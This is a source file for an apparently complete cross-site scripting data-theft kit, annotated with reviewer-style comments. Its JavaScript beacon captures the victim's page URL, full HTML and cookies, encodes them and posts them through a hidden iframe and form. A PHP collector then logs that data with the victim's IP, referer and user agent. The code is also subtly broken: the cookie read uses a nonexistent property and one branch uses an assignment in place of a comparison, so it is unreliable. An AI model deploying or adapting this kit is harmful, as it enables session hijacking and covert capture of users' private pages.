// ---------------------------------------------------------------------------
// Client-side beacon (JavaScript).
//
// This block is delivered to a browser and, on window load, serialises the
// current page (URL, full HTML, the script-readable cookie string) into a
// base64-encoded JSON object and POSTs it through a hidden form/iframe pair.
// From a defender's point of view the observable artefacts are: an <iframe>
// named "frame_xss", a <form id="form_xss" method="POST">, a hidden
// <input name="c" id="info"> whose value is base64 JSON, the implicit
// globals window.frame / window.form / window.e / window.body created below
// (no `var`), and a single text node "A" appended to the document.
// ---------------------------------------------------------------------------

// Send back: stuff the serialised payload into the hidden input and submit
// the form that was built by xssGatherInfo().
// @param {string} content - base64 JSON produced by xssGatherInfo()
function xssSendContent(content){
    // getElementById returns the first element with id "info"; if the host
    // page already has one, that element receives the value instead.
    document.getElementById('info').value = content;
    // Presumably to stop xssGatherInfo from firing again — not verifiable here.
    window.onload = null;
    document.getElementById('form_xss').submit();
}

// Collects page data, builds the hidden form/iframe once, and calls
// xssSendContent(). Installed as window.onload below.
function xssGatherInfo(){
    var info = {};
    // Current URL
    info.pageurl = document.location.href;
    // Contents of current page (entire <html> element, serialised)
    info.html = document.documentElement.outerHTML;
    // Any non HttpOnly cookies present. Cookies flagged HttpOnly are never
    // exposed to script, so that flag is the mitigation this line cannot defeat.
    info.cookies = document.cookies
    // NOTE(review): purpose not evident from this chunk. Reassigning innerHTML
    // re-parses the whole document with an "A" text node appended, which
    // replaces the existing DOM nodes — treat as a possible side effect on the
    // host page, to be confirmed.
    document.documentElement.innerHTML += 'A';
    // Build the submission channel only once per document.
    if( !document.getElementById('frame_xss') ){
        // Hidden iframe is the form target, so the POST does not navigate the page.
        frame = document.createElement('iframe');
        frame.style='visibility: hidden;';
        frame.name='frame_xss';
        form = document.createElement('form');
        // Empty action: the browser resolves it to the current document's URL.
        // Where the request actually lands depends on how this script is
        // deployed — cannot tell from this chunk.
        form.action = ''
        form.target = 'frame_xss';
        form.method='POST';
        form.id = 'form_xss';
        // Single hidden field "c" carries the whole payload.
        e = document.createElement('input');
        e.type = 'hidden';
        e.name = 'c';
        e.id = 'info';
        form.appendChild(e);
        body = document.getElementsByTagName('body')
        // Assignment, not comparison: `body.length = 0` evaluates to 0, so this
        // branch never runs as written.
        if( body.length = 0 ){
            document.documentElement.appendChild(document.createElement('body'));
            body = document.getElementsByTagName('body')
        }
        body = body[0];
        body.appendChild(frame);
        body.appendChild(form);
    }
    // Payload = base64( JSON.stringify(info) ); undefined members are dropped
    // by JSON.stringify, which is why the server checks property_exists below.
    xssSendContent(btoa(JSON.stringify(info)));
}
window.onload = xssGatherInfo;
// NOTE(review): looks like a template line — `$url` appears to be interpolated
// by the PHP that emits this script. The enclosing PHP string / echo is not
// visible in this chunk, so this cannot be confirmed.
scripturl = $url;

// ---------------------------------------------------------------------------
// Server-side collector (PHP).
//
// Assumes `$info` was already populated from the POSTed "c" field and that
// `$logging`, `$log_file`, `$db_host`, `$db_name`, `$db_user`, `$db_pass`
// are defined earlier in the file (none of that is visible in this chunk).
// Every value below except `logtime` originates from the remote client and
// must be treated as untrusted.
// ---------------------------------------------------------------------------

// Referer (client-supplied header; may be absent or forged)
$info->referer = $_SERVER['HTTP_REFERER'];
// User's user agent (client-supplied header)
$info->useragent = $_SERVER['HTTP_USER_AGENT'];
// User's IP address (as seen by this host; proxies/load balancers may mask it)
$info->userip = $_SERVER['REMOTE_ADDR'];
$info->method = $_SERVER['REQUEST_METHOD'];
$info->logtime = date('Y-m-d H:i:s');
// Fixed whitelist of loggable properties. It doubles as the only source of
// column names for the INSERT below, so column names never come from input.
// `scripturl` is listed here but not assigned in this chunk; property_exists
// skips it unless it was set earlier.
$aProperties = array( 'logtime', 'method', 'pageurl', 'scripturl', 'referer', 'cookies', 'useragent', 'userip', 'html' );
// Log this request
if( $logging == 'file' ){
    // File logging: values are appended verbatim, including the full captured
    // HTML. If `$log_file` is web-reachable or the log is viewed in a browser,
    // that untrusted markup is rendered as-is. Only properties present on
    // `$info` are written (see property_exists).
    $str = '';
    $str .= "\n\n===START XSS INFO===\n\n";
    foreach( $aProperties as $prop ){
        if( !property_exists( $info, $prop ) ) continue;
        $str .= $prop.": ".$info->{$prop}."\n";
    }
    $str .= "\n\n===END XSS INFO===\n\n";
    file_put_contents( $log_file, $str, FILE_APPEND );
}else{
    // DB logging. PDO error mode is not set here, so whether a failed connect
    // or insert throws depends on the PHP version's default — not verifiable
    // from this chunk. Connection charset is "utf8" (3-byte), not utf8mb4.
    $db = new PDO("mysql:host={$db_host};dbname={$db_name};charset=utf8", $db_user, $db_pass);
    // Build a column list and a matching "?" placeholder list, one entry per
    // property actually present on `$info`.
    $present = "";
    $markers = "";
    $comma = "";
    $data = array();
    foreach( $aProperties as $prop ){
        if( !property_exists( $info, $prop ) ) continue;
        $present .= $comma.' '.$prop;
        $markers .= $comma." ?";
        $data[] = $info->{$prop};
        $comma = ",";
    }
    // Column names come only from the `$aProperties` whitelist; all values are
    // bound through prepared-statement placeholders.
    $sql = "INSERT INTO log (".$present." ) VALUES (".$markers." )";
    $stmt = $db->prepare($sql);
    $stmt->execute($data);
}
?>